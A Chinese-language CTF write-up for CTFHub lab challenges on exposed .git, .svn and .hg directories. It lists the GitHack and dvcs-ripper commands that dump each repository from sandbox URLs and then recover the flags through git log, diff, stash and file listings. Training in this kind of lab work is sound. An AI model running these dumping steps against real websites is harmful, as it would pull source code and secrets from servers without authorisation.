1.GIT泄露
1.1 Log
1.我们可以使用GitHack进行**.git泄露的利用**,工具下载地址:https://github.com/BugScanTeam/GitHack
2.输入命令:python GitHack-master\GitHack.py http://challenge-17166fa2b0cc5f00.sandbox.ctfhub.com:10080/.git
3.看第一步输出的结果,进入到此目录下
4.执行:git log ,可以看到add flag这次命令中
5.于是执行 git diff 2f3f5b29289f349afae994e095c5609ee8d64b2c 得到flag
1.2 Stash
1.首先科普下Stash的知识点:能够将所有未提交的修改(工作区和暂存区)保存至堆栈中,用于后续恢复当前工作目录。
2.故这里先克隆到本地,输入命令:python GitHack.py http://challenge-be1a420a321d74ff.sandbox.ctfhub.com:10080/.git
3.进入路径后,输入: git stash list
4.输入 git stash apply 进行恢复,发现32133152115867.txt文件
5.打开路径下的txt文件,得到flag
1.3 Index
1.克隆到本地,输入命令:python GitHack.py http://challenge-a43ec4e1a10ec0fb.sandbox.ctfhub.com:10080/.git
2.进入目录输入:git ls-list,发现305563267425067.txt文件
3.进入目录后打开txt文件,得到flag
2.SVN泄露
1.首先下载dvcs-ripper-master工具,下载链接:https://github.com/kost/dvcs-ripper,下载好将其放入kali中(通过共享文件夹或者其他方式都可)
2.解压到当前目录,命令:unzip -d /tmp/ dvcs-ripper-master.zip
3.进入解压文件,克隆到本地,命令:/rip-svn.pl -v -u http://challenge-a95f679ae0fd1740.sandbox.ctfhub.com:10080/.svn/
(注:路径后面为 :.svn)
4.接下来进入 .svn/pristine 下,查看当前目录下的文件:ls -al
(注:这里面必须实验-al,查看隐藏文件)
5.发现有0a目录,进入目录下,发现**.svn-base**文件,使用cat查看文件,得到flag
3.HG泄露
1.和svn泄露使用同一个工具,只不过使用不通pl,这里使用rip-hg.pl 文件
2.输入命令,将网站克隆到本地:./rip-hg.pl -u http://challenge-4441f77585b5d6a3.sandbox.ctfhub.com:10080/.hg/
3.使用ls -al 查看隐藏文件,发现.hg文件夹
4.进入文件夹,经过不断的寻找,最后发现了一个为fncache的文件,使用cat查看文件内容,发现flag文件
5.使用网站打开文件,打开URL为:http://challenge-4441f77585b5d6a3.sandbox.ctfhub.com:10080/flag_278624239.txt 得到flag值